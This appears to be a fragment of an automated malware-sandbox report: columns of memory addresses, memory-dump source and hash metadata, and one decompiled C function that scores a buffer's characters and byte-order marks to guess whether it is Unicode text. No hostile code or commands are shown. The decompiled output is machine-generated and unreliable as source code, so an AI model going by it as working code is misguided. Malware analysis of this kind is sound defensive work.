                                  0x1e3c6eaa
                                  0x1e3c6ead
                                  0x1e3c6eb2
                                  0x1e3c6eb4
                                  0x1e3c6eb7
                                  0x1e3c7466
                                  0x1e3c7466
                                  0x00000000
                                  0x1e3c6ebd
                                  0x1e3c6ebd
                                  0x1e3c6ec4
                                  0x1e3c6eca
                                  0x1e3c6ecc
                                  0x1e3c6ecf
                                  0x1e3c6ed2
                                  0x1e3c6ede
                                  0x1e40f5df
                                  0x1e40f5e0
                                  0x00000000
                                  0x1e40f5e0
                                  0x1e3c6ee6
                                  0x00000000
                                  0x00000000
                                  0x1e3c6eec
                                  0x1e3c6ef3
                                  0x1e3c7181
                                  0x1e3c6f02
                                  0x1e3c6f02
                                  0x1e3c6f02
                                  0x1e3c6f0b
                                  0x1e3c6f0d
                                  0x1e3c6f10
                                  0x1e3c6f17
                                  0x1e3c6f21
                                  0x1e3c6f24
                                  0x1e3c6f2d
                                  0x1e3c6f31
                                  0x1e3c6f36
                                  0x1e3c6f3d
                                  0x1e3c7413
                                  0x1e3c7416
                                  0x1e3c7419
                                  0x1e3c741c
                                  0x1e3c7421
                                  0x1e3c742b
                                  0x1e3c742b
                                  0x1e3c742e
                                  0x1e3c7439
                                  0x1e40f60b
                                  0x1e40f60b
                                  0x1e40f615
                                  0x1e40f619
                                  0x1e3c743f
                                  0x1e3c7447
                                  0x1e3c7454
                                  0x1e3c745a
                                  0x1e3c745f
                                  0x1e3c745f
                                  0x00000000
                                  0x1e3c7439
                                  0x1e3c7425
                                  0x1e40f5e9
                                  0x1e40f5ed
                                  0x1e40f5f4
                                  0x00000000
                                  0x00000000
                                  0x1e40f5fd
                                  0x00000000
                                  0x00000000
                                  0x1e40f603
                                  0x1e40f603
                                  0x00000000
                                  0x1e3c6f43
                                  0x1e3c6f43
                                  0x1e3c6f45
                                  0x1e3c6f48
                                  0x1e3c6f4e
                                  0x1e3c6f65
                                  0x1e3c6f68
                                  0x1e3c721f
                                  0x1e3c6f83
                                  0x1e3c6f86
                                  0x1e3c72dc
                                  0x1e3c72dc
                                  0x1e3c6f9e
                                  0x1e3c6fa1
                                  0x1e3c6fa3
                                  0x1e3c6fa5
                                  0x1e3c6fa8
                                  0x1e3c6fab
                                  0x1e3c6fae
                                  0x1e3c6fb1
                                  0x1e3c6fb4
                                  0x1e3c6fb6
                                  0x1e3c6fb9
                                  0x1e3c6fbf
                                  0x1e3c718a
                                  0x1e3c718e
                                  0x1e40f831
                                  0x1e40f831
                                  0x1e40f833
                                  0x1e40f836
                                  0x00000000
                                  0x1e40f836
                                  0x1e3c7194
                                  0x00000000
                                  0x1e40f658
                                  0x1e40f658
                                  0x1e40f65a
                                  0x1e40f65d
                                  0x1e40f662
                                  0x1e40f662
                                  0x1e40f665
                                  0x1e40f667
                                  0x00000000
                                  0x00000000
                                  0x1e40f669
                                  0x1e40f66c
                                  0x1e40f670
                                  0x1e40f673
                                  0x1e40f67a
                                  0x1e40f67a
                                  0x1e40f67b
                                  0x1e40f67e
                                  0x1e40f681
                                  0x00000000
                                  0x00000000
                                  0x1e40f683
                                  0x1e40f683
                                  0x00000000
                                  0x1e40f683
                                  0x1e40f675
                                  0x1e40f678
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e40f678
                                  0x1e40f686
                                  0x1e40f688
                                  0x1e40f68b
                                  0x1e40f68e
                                  0x1e40f691
                                  0x1e40f694
                                  0x1e40f698
                                  0x1e40f69c
                                  0x1e40f6a0
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c7397
                                  0x1e3c739c
                                  0x1e3c739f
                                  0x1e3c73a3
                                  0x1e3c73a5
                                  0x1e40f6bb
                                  0x1e40f6c1
                                  0x1e40f6c4
                                  0x1e3c73ab
                                  0x1e3c73ab
                                  0x1e3c73ab
                                  0x1e3c73b1
                                  0x1e3c73b5
                                  0x1e3c73ba
                                  0x1e3c73c0
                                  0x1e3c73c3
                                  0x1e3c73c7
                                  0x1e3c73cc
                                  0x1e3c73d0
                                  0x1e3c73d3
                                  0x1e40f6cc
                                  0x1e40f6d4
                                  0x1e40f6d9
                                  0x1e40f6dd
                                  0x1e40f6e1
                                  0x1e40f6e5
                                  0x1e40f6f0
                                  0x1e40f6fc
                                  0x1e40f700
                                  0x1e40f709
                                  0x1e40f70e
                                  0x1e40f710
                                  0x1e40f784
                                  0x1e40f788
                                  0x1e40f78b
                                  0x1e40f78e
                                  0x1e40f790
                                  0x1e40f792
                                  0x1e40f795
                                  0x1e40f798
                                  0x1e40f7b7
                                  0x1e40f7b7
                                  0x1e40f7ba
                                  0x1e40f7ba
                                  0x00000000
                                  0x1e40f7ba
                                  0x1e40f79a
                                  0x1e40f79d
                                  0x00000000
                                  0x00000000
                                  0x1e40f79f
                                  0x1e40f7a4
                                  0x1e40f7a7
                                  0x1e40f7ab
                                  0x1e40f7ae
                                  0x1e40f7b1
                                  0x00000000
                                  0x1e40f7b1
                                  0x1e40f712
                                  0x1e40f717
                                  0x1e40f74c
                                  0x1e40f74e
                                  0x1e40f752
                                  0x1e40f756
                                  0x1e40f75d
                                  0x1e40f761
                                  0x1e40f764
                                  0x1e40f76c
                                  0x1e40f771
                                  0x1e40f775
                                  0x1e40f778
                                  0x1e40f77c
                                  0x00000000
                                  0x1e40f77c
                                  0x1e40f719
                                  0x1e40f71d
                                  0x1e40f720
                                  0x1e40f723
                                  0x1e40f726
                                  0x1e40f729
                                  0x1e40f72e
                                  0x1e40f740
                                  0x1e40f744
                                  0x00000000
                                  0x1e40f744
                                  0x1e40f730
                                  0x1e40f732
                                  0x1e40f735
                                  0x1e40f738
                                  0x00000000
                                  0x1e3c73d9
                                  0x1e3c73d9
                                  0x1e3c73db
                                  0x1e3c73de
                                  0x1e3c73e1
                                  0x1e3c73e4
                                  0x1e3c73e7
                                  0x1e3c73ea
                                  0x1e3c73ef
                                  0x1e3c73f2
                                  0x1e3c73f6
                                  0x1e3c73f9
                                  0x1e3c73f9
                                  0x1e3c73fe
                                  0x1e3c7401
                                  0x1e3c7406
                                  0x1e3c7409
                                  0x00000000
                                  0x1e3c7409
                                  0x00000000
                                  0x1e40f7c5
                                  0x1e40f7ca
                                  0x1e40f7cd
                                  0x1e40f7d1
                                  0x1e40f7d3
                                  0x1e40f7da
                                  0x1e40f7e0
                                  0x1e40f7e3
                                  0x1e40f7e3
                                  0x1e40f7e6
                                  0x1e40f7d5
                                  0x1e40f7d5
                                  0x1e40f7d5
                                  0x1e40f7e9
                                  0x1e40f7eb
                                  0x1e40f7f0
                                  0x1e40f7f3
                                  0x1e40f7f5
                                  0x1e40f7f8
                                  0x1e40f7fb
                                  0x1e40f7fe
                                  0x1e40f801
                                  0x1e40f80f
                                  0x1e40f814
                                  0x1e40f803
                                  0x1e40f803
                                  0x1e40f806
                                  0x1e40f806
                                  0x00000000
                                  0x00000000
                                  0x1e3c719d
                                  0x1e3c71a2
                                  0x1e3c71a5
                                  0x1e3c71a9
                                  0x1e3c71ab
                                  0x1e40f826
                                  0x1e40f829
                                  0x1e3c71b1
                                  0x1e3c71b1
                                  0x1e3c71ba
                                  0x1e3c71ba
                                  0x1e3c71bf
                                  0x1e3c71c5
                                  0x1e3c71cf
                                  0x1e3c71d2
                                  0x1e3c71d8
                                  0x1e3c71dd
                                  0x1e3c71e4
                                  0x1e3c71e7
                                  0x00000000
                                  0x00000000
                                  0x1e3c7275
                                  0x1e3c727a
                                  0x1e3c727d
                                  0x1e3c727f
                                  0x1e3c7282
                                  0x1e3c7284
                                  0x1e40f6a8
                                  0x1e40f6aa
                                  0x1e40f6aa
                                  0x1e3c728a
                                  0x1e3c728f
                                  0x1e3c7292
                                  0x1e3c7297
                                  0x1e3c729a
                                  0x1e3c729d
                                  0x1e3c72a0
                                  0x1e3c72a5
                                  0x1e3c72a9
                                  0x1e3c72ac
                                  0x1e3c72af
                                  0x1e3c72b2
                                  0x1e3c72b5
                                  0x1e3c72b7
                                  0x1e3c72ba
                                  0x1e3c72be
                                  0x1e3c72be
                                  0x1e3c72c2
                                  0x1e3c72c5
                                  0x1e3c72c8
                                  0x1e40f6b2
                                  0x1e40f6b2
                                  0x00000000
                                  0x00000000
                                  0x1e3c6fc5
                                  0x1e3c6fc5
                                  0x1e3c6fcc
                                  0x1e3c6fd8
                                  0x1e3c6fda
                                  0x1e3c6fdd
                                  0x1e3c6fe3
                                  0x1e3c7162
                                  0x1e40f845
                                  0x00000000
                                  0x00000000
                                  0x1e40f84e
                                  0x1e40f8c4
                                  0x1e40f8c8
                                  0x1e40f8cb
                                  0x1e40f8ce
                                  0x1e3c70e0
                                  0x1e3c70e0
                                  0x1e3c70e3
                                  0x1e3c70e3
                                  0x1e3c70ea
                                  0x1e3c70ef
                                  0x1e3c70f1
                                  0x1e3c70f4
                                  0x1e3c70fc
                                  0x1e3c70fd
                                  0x1e3c70fe
                                  0x1e3c710c
                                  0x1e3c710c
                                  0x1e40f850
                                  0x1e40f858
                                  0x1e40f87a
                                  0x1e40f88a
                                  0x1e40f88d
                                  0x1e40f890
                                  0x1e40f893
                                  0x1e40f895
                                  0x1e40f898
                                  0x1e40f8a4
                                  0x1e40f8ad
                                  0x1e40f8b0
                                  0x1e40f8b3
                                  0x1e40f8b3
                                  0x1e40f8a4
                                  0x1e3c6fec
                                  0x1e3c6fec
                                  0x1e3c6fee
                                  0x00000000
                                  0x1e3c6ff1
                                  0x1e3c6ff8
                                  0x00000000
                                  0x1e3c6ffe
                                  0x1e3c7004
                                  0x1e3c7006
                                  0x1e3c7006
                                  0x1e3c7010
                                  0x1e3c7017
                                  0x1e3c701e
                                  0x1e3c7072
                                  0x1e3c7074
                                  0x1e3c707e
                                  0x1e3c7083
                                  0x1e3c7087
                                  0x1e3c7088
                                  0x1e3c706c
                                  0x1e3c706c
                                  0x1e3c706d
                                  0x00000000
                                  0x1e3c706d
                                  0x1e3c707c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c707c
                                  0x1e3c7020
                                  0x1e3c7023
                                  0x1e3c71ef
                                  0x1e3c71ef
                                  0x1e3c71f2
                                  0x1e3c71f7
                                  0x00000000
                                  0x00000000
                                  0x1e3c71fd
                                  0x1e3c7200
                                  0x1e3c7205
                                  0x1e3c720b
                                  0x1e3c720e
                                  0x1e3c72eb
                                  0x00000000
                                  0x00000000
                                  0x1e3c72f6
                                  0x00000000
                                  0x1e3c7030
                                  0x1e3c7037
                                  0x1e3c703e
                                  0x1e3c7055
                                  0x1e3c705a
                                  0x1e3c7062
                                  0x1e40f908
                                  0x1e40f90e
                                  0x1e40f90f
                                  0x1e40f90f
                                  0x1e40f908
                                  0x1e3c7062
                                  0x1e3c705a
                                  0x00000000
                                  0x1e3c7045
                                  0x1e3c7045
                                  0x1e3c7049
                                  0x1e3c704a
                                  0x1e3c704d
                                  0x1e3c704e
                                  0x00000000
                                  0x1e3c704e
                                  0x1e3c703e
                                  0x1e3c7068
                                  0x1e3c7069
                                  0x00000000
                                  0x1e3c7069
                                  0x1e3c72fc
                                  0x1e3c7301
                                  0x1e3c7304
                                  0x1e3c7314
                                  0x1e3c7314
                                  0x1e3c7319
                                  0x00000000
                                  0x00000000
                                  0x1e3c7325
                                  0x1e3c732d
                                  0x1e3c7330
                                  0x1e3c7356
                                  0x1e3c7357
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c7332
                                  0x1e3c7332
                                  0x1e3c7337
                                  0x00000000
                                  0x00000000
                                  0x1e3c7343
                                  0x1e3c734b
                                  0x1e3c734e
                                  0x1e3c7361
                                  0x00000000
                                  0x00000000
                                  0x1e3c7367
                                  0x1e3c7367
                                  0x1e3c7368
                                  0x00000000
                                  0x1e3c7368
                                  0x1e3c7350
                                  0x1e3c7351
                                  0x1e3c7351
                                  0x00000000
                                  0x1e3c7332
                                  0x1e40f8f9
                                  0x1e40f8f9
                                  0x1e40f8fa
                                  0x00000000
                                  0x1e40f8fa
                                  0x1e3c7306
                                  0x1e3c730e
                                  0x1e40f8ee
                                  0x00000000
                                  0x00000000
                                  0x1e40f8f4
                                  0x00000000
                                  0x1e3c730e
                                  0x1e3c7214
                                  0x1e3c7214
                                  0x1e3c7217
                                  0x00000000
                                  0x1e3c7217
                                  0x1e3c702c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c702c
                                  0x1e3c708d
                                  0x1e3c7094
                                  0x1e3c7098
                                  0x1e3c70a0
                                  0x1e3c738c
                                  0x1e3c738d
                                  0x1e3c738d
                                  0x1e3c70a0
                                  0x1e3c7098
                                  0x1e3c70a6
                                  0x1e3c70ab
                                  0x1e3c70b3
                                  0x1e3c70b5
                                  0x1e3c70cd
                                  0x1e3c70cd
                                  0x1e3c70d0
                                  0x1e3c70d8
                                  0x1e3c711a
                                  0x1e3c711c
                                  0x1e3c711c
                                  0x1e3c7121
                                  0x00000000
                                  0x00000000
                                  0x1e3c7129
                                  0x00000000
                                  0x00000000
                                  0x1e3c712b
                                  0x1e3c712b
                                  0x1e3c7130
                                  0x1e3c737e
                                  0x1e3c7381
                                  0x00000000
                                  0x1e3c7381
                                  0x1e3c7138
                                  0x00000000
                                  0x00000000
                                  0x1e3c7144
                                  0x1e3c7144
                                  0x1e3c70da
                                  0x1e3c70da
                                  0x1e3c70dd
                                  0x00000000
                                  0x1e3c70dd
                                  0x1e3c70b7
                                  0x1e3c70b8
                                  0x1e3c70bb
                                  0x1e3c70c2
                                  0x00000000
                                  0x00000000
                                  0x1e3c70c7
                                  0x00000000
                                  0x00000000
                                  0x1e3c70c9
                                  0x1e3c70ca
                                  0x00000000
                                  0x1e3c70ad
                                  0x1e3c70ad
                                  0x1e3c70af
                                  0x00000000
                                  0x1e3c70af
                                  0x1e3c7148
                                  0x1e3c714d
                                  0x1e40f8e2
                                  0x1e40f8e2
                                  0x1e3c7153
                                  0x1e3c7154
                                  0x1e3c7157
                                  0x00000000
                                  0x1e3c7157
                                  0x1e40f87c
                                  0x1e40f87f
                                  0x1e40f882
                                  0x00000000
                                  0x1e40f882
                                  0x1e40f85e
                                  0x00000000
                                  0x00000000
                                  0x1e40f864
                                  0x1e40f869
                                  0x1e40f86c
                                  0x00000000
                                  0x1e40f86c
                                  0x1e3c7168
                                  0x1e3c7170
                                  0x1e40f8d6
                                  0x1e40f8d6
                                  0x1e3c7176
                                  0x1e3c7179
                                  0x00000000
                                  0x1e3c7179
                                  0x1e3c6fe9
                                  0x1e3c6fe9
                                  0x00000000
                                  0x1e3c6fe9
                                  0x1e3c6fbf
                                  0x1e3c6f8c
                                  0x1e3c6f93
                                  0x1e3c72d6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c72d6
                                  0x1e3c6f99
                                  0x1e3c6f99
                                  0x1e3c6f99
                                  0x00000000
                                  0x1e3c6f68
                                  0x1e3c6f50
                                  0x1e3c6f56
                                  0x1e3c722c
                                  0x1e40f629
                                  0x1e40f629
                                  0x00000000
                                  0x1e40f629
                                  0x1e3c7232
                                  0x1e3c7239
                                  0x1e40f623
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e40f623
                                  0x1e3c723f
                                  0x1e3c7242
                                  0x1e40f64e
                                  0x1e40f64e
                                  0x00000000
                                  0x1e40f64e
                                  0x1e3c7248
                                  0x1e3c724f
                                  0x1e3c7373
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c7379
                                  0x1e3c7255
                                  0x1e3c7258
                                  0x1e40f63c
                                  0x1e40f648
                                  0x00000000
                                  0x1e40f648
                                  0x1e3c725e
                                  0x1e3c7265
                                  0x1e40f636
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e40f636
                                  0x1e3c726b
                                  0x1e3c726b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c6f56
                                  0x1e3c6f3d
                                  0x1e3c6ed2
                                  0x00000000
                                  0x1e3c6ec4

                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e4f3f1333a6b7045ddd3406b43c66c3274ad1e15d379a113b8c7713791bb22cc
                                  • Instruction ID: f20ac5a1e9a6253d37313d1204386e45cc3efbb22e9c79a707fb6e88634d4e77
                                  • Opcode Fuzzy Hash: e4f3f1333a6b7045ddd3406b43c66c3274ad1e15d379a113b8c7713791bb22cc
                                  • Instruction Fuzzy Hash: C2027B71D142698BCB25CFA9C4906ADB7B6BF44700F21436FE816AB294E770DC92CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000A2FB0, Relevance: .4, Instructions: 435COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                  • Instruction ID: 2872b6e9acc24196feca4ae91349ab4e227b2126b44e60f32c6ff5117dda5df9
                                  • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                  • Instruction Fuzzy Hash: 8C026F73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3A0D20, Relevance: .4, Instructions: 372COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 99%
                                  			E1E3A0D20(signed short* _a4, signed char _a8, unsigned int _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _t159;
				unsigned int _t160;
				signed int _t162;
				unsigned int _t163;
				signed int _t180;
				signed int _t192;
				signed int _t193;
				unsigned int _t194;
				signed char _t196;
				signed int _t197;
				signed char _t198;
				signed char _t199;
				unsigned int _t200;
				unsigned int _t202;
				unsigned int _t204;
				unsigned int _t205;
				unsigned int _t209;
				signed int _t210;
				signed int _t211;
				unsigned int _t212;
				signed char _t213;
				signed short* _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				unsigned int _t218;
				signed int _t220;
				signed int _t221;
				signed short _t223;
				signed char _t224;
				signed int _t229;
				signed int _t231;
				unsigned int _t233;
				unsigned int _t237;
				signed int _t238;
				unsigned int _t239;
				signed int _t240;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				unsigned int _t258;
				void* _t261;

				_t213 = _a8;
				_t159 = 0;
				_v60 = 0;
				_t237 = _t213 >> 1;
				_t210 = 0;
				_t257 = 0;
				_v56 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v92 = 0;
				_v88 = 0;
				_v76 = 0;
				_v72 = 0;
				_v64 = 0;
				_v68 = 0;
				_v24 = 0;
				_v80 = 0;
				_v84 = 0;
				_v28 = 0;
				_v32 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v100 = _t237;
				if(_t237 > 0x100) {
					_t254 = 0x100;
					_v36 = 0x100;
					L2:
					_t261 = _t213 - 2;
					if(_t261 == 0) {
						_t214 = _a4;
						_t160 =  *_t214 & 0x0000ffff;
						__eflags = _t160;
						if(_t160 == 0) {
							L108:
							_t159 = 0;
							L8:
							_t238 = 0;
							_v96 = 0;
							if(_t254 == 0) {
								L30:
								_v24 = _t159 - 1;
								goto L31;
							} else {
								goto L11;
								L13:
								_t224 = _t223 >> 8;
								_v40 = _t224;
								_t256 = _t224 & 0x000000ff;
								_t196 = _a4[_t238];
								_v5 = _t196;
								_t197 = _t196 & 0x000000ff;
								if(_t197 == 0xd) {
									__eflags = _t257 - 0xa;
									if(_t257 == 0xa) {
										_v12 = _v12 + 1;
									}
								} else {
									if(_t197 == 0xa) {
										__eflags = _t257 - 0xd;
										if(_t257 == 0xd) {
											_v12 = _v12 + 1;
										}
									}
								}
								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
								if(_t256 > _t257) {
									_t229 = _t256;
								} else {
									_t229 = _t257;
								}
								if(_t257 >= _t256) {
									_t257 = _t256;
								}
								_v28 = _v28 + _t229 - _t257;
								_t231 = _t197;
								if(_t197 <= _t210) {
									_t231 = _t210;
								}
								if(_t210 >= _t197) {
									_t210 = _t197;
								}
								_v32 = _v32 + _t231 - _t210;
								_t238 = _v96 + 1;
								_t210 = _t197;
								_t257 = _t256;
								_v96 = _t238;
								if(_t238 < _v36) {
									_t214 = _a4;
									L11:
									_t223 = _t214[_t238] & 0x0000ffff;
									_t193 = _t223 & 0x0000ffff;
									if(_t193 >= 0x900 || _t193 < 0x21) {
										goto L58;
									} else {
										goto L13;
									}
								}
								_t198 = _v5;
								if(_t198 == 0xd) {
									_t199 = _v40;
									__eflags = _t199 - 0xa;
									if(_t199 != 0xa) {
										L27:
										_t233 = _v12;
										L28:
										if(_t199 != 0) {
											__eflags = _t199 - 0x1a;
											if(_t199 == 0x1a) {
												_v12 = _t233 + 1;
											}
											L31:
											_t162 = _a8;
											if(_t162 > 0x200) {
												_t255 = 0x200;
											} else {
												_t255 = _t162;
											}
											_t215 =  *0x1e496d59; // 0x0
											if(_t215 != 0) {
												_t239 = 0;
												__eflags = _t255;
												if(_t255 == 0) {
													goto L34;
												} else {
													goto L119;
												}
												do {
													L119:
													_t192 =  *(_a4 + _t239) & 0x000000ff;
													__eflags =  *((short*)(0x1e496920 + _t192 * 2));
													_t163 = _v20;
													if( *((short*)(0x1e496920 + _t192 * 2)) != 0) {
														_t163 = _t163 + 1;
														_t239 = _t239 + 1;
														__eflags = _t239;
														_v20 = _t163;
													}
													_t239 = _t239 + 1;
													__eflags = _t239 - _t255;
												} while (_t239 < _t255);
												goto L35;
											} else {
												L34:
												_t163 = 0;
												L35:
												_t240 = _v32;
												_t211 = _v28;
												if(_t240 < 0x7f) {
													__eflags = _t211;
													if(_t211 != 0) {
														L37:
														if(_t240 == 0) {
															_v16 = 0x10;
														}
														L38:
														_t258 = _a12;
														if(_t215 != 0) {
															__eflags = _t163;
															if(_t163 == 0) {
																goto L39;
															}
															__eflags = _t258;
															if(_t258 == 0) {
																goto L39;
															}
															__eflags =  *_t258 & 0x00000400;
															if(( *_t258 & 0x00000400) == 0) {
																goto L39;
															}
															_t218 = _v100;
															__eflags = _t218 - 0x100;
															if(_t218 > 0x100) {
																_t218 = 0x100;
															}
															_t220 = (_t218 >> 1) - 1;
															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
																_t221 = _t220 + _t220;
																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
																asm("sbb ecx, ecx");
																_t216 =  ~_t221 + 1;
																__eflags = _t216;
															} else {
																_t216 = 3;
															}
															_v16 = _v16 | 0x00000400;
															_t240 = _v32;
															L40:
															if(_t211 * _t216 < _t240) {
																_v16 = _v16 | 0x00000002;
															}
															_t217 = _v16;
															if(_t240 * _t216 < _t211) {
																_t217 = _t217 | 0x00000020;
															}
															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
																_t217 = _t217 | 0x00000004;
															}
															if(_v64 + _v68 + _v72 + _v76 != 0) {
																_t217 = _t217 | 0x00000040;
															}
															if(_v80 + _v84 + _v88 + _v92 == 0) {
																_t212 = _v12;
																__eflags = _t212;
																if(_t212 == 0) {
																	goto L48;
																}
																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
																	goto L47;
																}
																goto L48;
															} else {
																L47:
																_t217 = _t217 | 0x00000100;
																L48:
																if((_a8 & 0x00000001) != 0) {
																	_t217 = _t217 | 0x00000200;
																}
																if(_v24 != 0) {
																	_t217 = _t217 | 0x00001000;
																}
																_t180 =  *_a4 & 0x0000ffff;
																if(_t180 != 0xfeff) {
																	__eflags = _t180 - 0xfffe;
																	if(_t180 == 0xfffe) {
																		_t217 = _t217 | 0x00000080;
																	}
																} else {
																	_t217 = _t217 | 0x00000008;
																}
																if(_t258 != 0) {
																	 *_t258 =  *_t258 & _t217;
																	_t217 =  *_t258;
																}
																if((_t217 & 0x00000b08) != 8) {
																	__eflags = _t217 & 0x000000f0;
																	if((_t217 & 0x000000f0) != 0) {
																		L84:
																		return 0;
																	}
																	__eflags = _t217 & 0x00000f00;
																	if((_t217 & 0x00000f00) == 0) {
																		__eflags = _t217 & 0x0000f00f;
																		if((_t217 & 0x0000f00f) == 0) {
																			goto L84;
																		}
																		goto L56;
																	}
																	goto L84;
																} else {
																	L56:
																	return 1;
																}
															}
														}
														L39:
														_t216 = 3;
														goto L40;
													}
													_v16 = 1;
													goto L38;
												}
												if(_t211 == 0) {
													goto L38;
												}
												goto L37;
											}
										} else {
											_t159 = _v24;
											goto L30;
										}
									}
									L104:
									_t233 = _v12 + 1;
									_v12 = _t233;
									goto L28;
								}
								_t199 = _v40;
								if(_t198 != 0xa || _t199 != 0xd) {
									goto L27;
								} else {
									goto L104;
								}
								L58:
								__eflags = _t193 - 0x3001;
								if(_t193 < 0x3001) {
									L60:
									__eflags = _t193 - 0xd00;
									if(__eflags > 0) {
										__eflags = _t193 - 0x3000;
										if(__eflags > 0) {
											_t194 = _t193 - 0xfeff;
											__eflags = _t194;
											if(_t194 != 0) {
												_t200 = _t194 - 0xff;
												__eflags = _t200;
												if(_t200 == 0) {
													_v88 = _v88 + 1;
												} else {
													__eflags = _t200 == 1;
													if(_t200 == 1) {
														_v92 = _v92 + 1;
													}
												}
											}
										} else {
											if(__eflags == 0) {
												_v48 = _v48 + 1;
											} else {
												_t202 = _t193 - 0x2000;
												__eflags = _t202;
												if(_t202 == 0) {
													_v68 = _v68 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v76 = _v76 + 1;
										goto L13;
									}
									__eflags = _t193 - 0x20;
									if(__eflags > 0) {
										_t204 = _t193 - 0x900;
										__eflags = _t204;
										if(_t204 == 0) {
											_v64 = _v64 + 1;
										} else {
											_t205 = _t204 - 0x100;
											__eflags = _t205;
											if(_t205 == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t205 == 0xd;
												if(_t205 == 0xd) {
													_v84 = _v84 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v44 = _v44 + 1;
										goto L13;
									}
									__eflags = _t193 - 0xd;
									if(_t193 > 0xd) {
										goto L13;
									}
									_t84 = _t193 + 0x1e3a1174; // 0x4040400
									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M1E3A1160))) {
										case 0:
											_v80 = _v80 + 1;
											goto L13;
										case 1:
											_v52 = _v52 + 1;
											goto L13;
										case 2:
											_v56 = _v56 + 1;
											goto L13;
										case 3:
											_v60 = _v60 + 1;
											goto L13;
										case 4:
											goto L13;
									}
								}
								__eflags = _t193 - 0xfeff;
								if(_t193 < 0xfeff) {
									goto L13;
								}
								goto L60;
							}
						}
						__eflags = _t160 >> 8;
						if(_t160 >> 8 == 0) {
							L101:
							_t209 = _a12;
							__eflags = _t209;
							if(_t209 != 0) {
								 *_t209 = 5;
							}
							goto L84;
						}
						goto L108;
					}
					if(_t261 <= 0 || _t237 > 0x100) {
						_t214 = _a4;
					} else {
						_t214 = _a4;
						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
							_t254 = _t254 - 1;
							_v36 = _t254;
						}
					}
					goto L8;
				}
				_t254 = _t237;
				_v36 = _t254;
				if(_t254 == 0) {
					goto L101;
				}
				goto L2;
			}






































































                                  0x1e3a0d2b
                                  0x1e3a0d2e
                                  0x1e3a0d32
                                  0x1e3a0d39
                                  0x1e3a0d3b
                                  0x1e3a0d3d
                                  0x1e3a0d3f
                                  0x1e3a0d46
                                  0x1e3a0d4d
                                  0x1e3a0d54
                                  0x1e3a0d5b
                                  0x1e3a0d62
                                  0x1e3a0d69
                                  0x1e3a0d70
                                  0x1e3a0d77
                                  0x1e3a0d7e
                                  0x1e3a0d85
                                  0x1e3a0d88
                                  0x1e3a0d8b
                                  0x1e3a0d8e
                                  0x1e3a0d91
                                  0x1e3a0d94
                                  0x1e3a0d97
                                  0x1e3a0d9a
                                  0x1e3a0d9d
                                  0x1e3a0da6
                                  0x1e3a10e9
                                  0x1e3a10ee
                                  0x1e3a0db9
                                  0x1e3a0db9
                                  0x1e3a0dbc
                                  0x1e3fe9c7
                                  0x1e3fe9ca
                                  0x1e3fe9cd
                                  0x1e3fe9d0
                                  0x1e3fe9dd
                                  0x1e3fe9dd
                                  0x1e3a0dec
                                  0x1e3a0dec
                                  0x1e3a0dee
                                  0x1e3a0df3
                                  0x1e3a0ebf
                                  0x1e3a0ec0
                                  0x00000000
                                  0x1e3a0df9
                                  0x1e3a0df9
                                  0x1e3a0e1e
                                  0x1e3a0e21
                                  0x1e3a0e24
